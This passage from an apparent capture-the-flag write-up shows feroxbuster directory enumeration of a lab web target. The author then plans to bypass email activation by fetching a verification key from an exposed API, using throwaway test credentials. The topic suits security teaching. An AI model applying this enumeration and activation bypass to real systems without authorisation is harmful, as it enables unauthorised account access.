200      GET     1174l     2123w    22559c http://154.57.164.74:30838/static/styles.css
200      GET      154l      452w     7083c http://154.57.164.74:30838/
301      GET        7l       11w      169c http://154.57.164.74:30838/static =&gt; http://154.57.164.74/static/
302      GET        5l       22w      199c http://154.57.164.74:30838/dashboard =&gt; http://154.57.164.74:30838/login
[##&gt;-----------------] - 12s     3112/30009   2m      found:14      errors:1      
&#128680; Caught ctrl+c &#128680; saving scan state to ferox-http_154_57_164_74_30838_-1775118734.state ...
[##&gt;-----------------] - 12s     3113/30009   2m      found:14      errors:1      
[##&gt;-----------------] - 12s     3095/30000   248/s   http://154.57.164.74:30838/                                                                                                                                                                                                                                                                                                                     

&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo feroxbuster -u http://154.57.164.74:30838/api/ --filter-status 404
                                                                                                                                                                                                   
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher &#129299;                 ver: 2.13.1
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
 &#127919;  Target Url            &#9474; http://154.57.164.74:30838/api
 &#128681;  In-Scope Url          &#9474; 154.57.164.74
 &#128640;  Threads               &#9474; 50
 &#128214;  Wordlist              &#9474; /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 &#128162;  Status Code Filters   &#9474; [404]
 &#128165;  Timeout (secs)        &#9474; 7
 &#129441;  User-Agent            &#9474; feroxbuster/2.13.1
 &#128137;  Config File           &#9474; /etc/feroxbuster/ferox-config.toml
 &#128270;  Extract Links         &#9474; true
 &#127937;  HTTP methods          &#9474; [GET]
 &#128259;  Recursion Depth       &#9474; 4
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
 &#127937;  Press [ENTER] to use the Scan Management Menu&#8482;
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
404      GET        1l        2w       22c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        7l       11w      169c http://154.57.164.74:30838/api =&gt; http://154.57.164.74/api/
405      GET        1l        3w       31c http://154.57.164.74:30838/api/register
405      GET        1l        3w       31c http://154.57.164.74:30838/api/login
401      GET        1l        2w       30c http://154.57.164.74:30838/api/files
200      GET       31l       64w      962c http://154.57.164.74:30838/api/docs</code></pre></div><p>So there&#8217;s nothing much:</p><ul><li><p>Register First</p></li><li><p>Activate our email address via leaked API interface</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BWth!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e1dd261-a2e2-4fa4-98f6-f6ca574f074e_1588x963.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BWth!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e1dd261-a2e2-4fa4-98f6-f6ca574f074e_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!BWth!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e1dd261-a2e2-4fa4-98f6-f6ca574f074e_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!BWth!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e1dd261-a2e2-4fa4-98f6-f6ca574f074e_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!BWth!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e1dd261-a2e2-4fa4-98f6-f6ca574f074e_1588x963.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BWth!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e1dd261-a2e2-4fa4-98f6-f6ca574f074e_1588x963.png" width="1456" height="883" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5e1dd261-a2e2-4fa4-98f6-f6ca574f074e_1588x963.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:883,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:172090,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192936305?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e1dd261-a2e2-4fa4-98f6-f6ca574f074e_1588x963.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!BWth!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e1dd261-a2e2-4fa4-98f6-f6ca574f074e_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!BWth!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e1dd261-a2e2-4fa4-98f6-f6ca574f074e_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!BWth!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e1dd261-a2e2-4fa4-98f6-f6ca574f074e_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!BWth!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e1dd261-a2e2-4fa4-98f6-f6ca574f074e_1588x963.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Let&#8217;s make access:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: ayam@gonuclear.com
passwd: ayam</code></pre></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!uCm5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffd2be859-a139-415a-b266-be13c6bd77e7_1588x963.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!uCm5!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffd2be859-a139-415a-b266-be13c6bd77e7_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!uCm5!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffd2be859-a139-415a-b266-be13c6bd77e7_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!uCm5!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffd2be859-a139-415a-b266-be13c6bd77e7_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!uCm5!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffd2be859-a139-415a-b266-be13c6bd77e7_1588x963.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!uCm5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffd2be859-a139-415a-b266-be13c6bd77e7_1588x963.png" width="1456" height="883" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fd2be859-a139-415a-b266-be13c6bd77e7_1588x963.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:883,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:112384,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192936305?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffd2be859-a139-415a-b266-be13c6bd77e7_1588x963.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!uCm5!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffd2be859-a139-415a-b266-be13c6bd77e7_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!uCm5!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffd2be859-a139-415a-b266-be13c6bd77e7_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!uCm5!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffd2be859-a139-415a-b266-be13c6bd77e7_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!uCm5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffd2be859-a139-415a-b266-be13c6bd77e7_1588x963.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>And yep, we needed to activate it!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!LTkx!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3090b0e6-9e23-4d90-a017-412275c99598_1588x963.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!LTkx!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3090b0e6-9e23-4d90-a017-412275c99598_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!LTkx!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3090b0e6-9e23-4d90-a017-412275c99598_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!LTkx!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3090b0e6-9e23-4d90-a017-412275c99598_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!LTkx!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3090b0e6-9e23-4d90-a017-412275c99598_1588x963.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!LTkx!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3090b0e6-9e23-4d90-a017-412275c99598_1588x963.png" width="1456" height="883" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3090b0e6-9e23-4d90-a017-412275c99598_1588x963.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:883,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:132977,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192936305?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3090b0e6-9e23-4d90-a017-412275c99598_1588x963.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!LTkx!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3090b0e6-9e23-4d90-a017-412275c99598_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!LTkx!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3090b0e6-9e23-4d90-a017-412275c99598_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!LTkx!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3090b0e6-9e23-4d90-a017-412275c99598_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!LTkx!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3090b0e6-9e23-4d90-a017-412275c99598_1588x963.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>So in the API:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!cYs3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd707427d-9535-4c08-9e7d-2ecc2bf721f2_1588x963.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!cYs3!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd707427d-9535-4c08-9e7d-2ecc2bf721f2_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!cYs3!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd707427d-9535-4c08-9e7d-2ecc2bf721f2_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!cYs3!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd707427d-9535-4c08-9e7d-2ecc2bf721f2_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!cYs3!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd707427d-9535-4c08-9e7d-2ecc2bf721f2_1588x963.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!cYs3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd707427d-9535-4c08-9e7d-2ecc2bf721f2_1588x963.png" width="1456" height="883" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d707427d-9535-4c08-9e7d-2ecc2bf721f2_1588x963.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:883,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:133915,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192936305?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd707427d-9535-4c08-9e7d-2ecc2bf721f2_1588x963.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!cYs3!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd707427d-9535-4c08-9e7d-2ecc2bf721f2_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!cYs3!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd707427d-9535-4c08-9e7d-2ecc2bf721f2_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!cYs3!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd707427d-9535-4c08-9e7d-2ecc2bf721f2_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!cYs3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd707427d-9535-4c08-9e7d-2ecc2bf721f2_1588x963.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>We:</p><ul><li><p>First confirm our email used for registration</p></li><li><p>Get an activated Key</p></li><li><p>And parse the Key on &#8220;email-verify&#8220;</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!dFJN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9da6a2b5-2ed8-43ac-9e87-7ab75ebbae1a_1588x963.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!dFJN!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9da6a2b5-2ed8-43ac-9e87-7ab75ebbae1a_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!dFJN!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9da6a2b5-2ed8-43ac-9e87-7ab75ebbae1a_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!dFJN!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9da6a2b5-2ed8-43ac-9e87-7ab75ebbae1a_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!dFJN!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9da6a2b5-2ed8-43ac-9e87-7ab75ebbae1a_1588x963.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!dFJN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9da6a2b5-2ed8-43ac-9e87-7ab75ebbae1a_1588x963.png" width="1456" height="883" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9da6a2b5-2ed8-43ac-9e87-7ab75ebbae1a_1588x963.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:883,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:111889,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192936305?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9da6a2b5-2ed8-43ac-9e87-7ab75ebbae1a_1588x963.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!dFJN!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9da6a2b5-2ed8-43ac-9e87-7ab75ebbae1a_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!dFJN!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9da6a2b5-2ed8-43ac-9e87-7ab75ebbae1a_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!dFJN!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9da6a2b5-2ed8-43ac-9e87-7ab75ebbae1a_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!dFJN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9da6a2b5-2ed8-43ac-9e87-7ab75ebbae1a_1588x963.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" 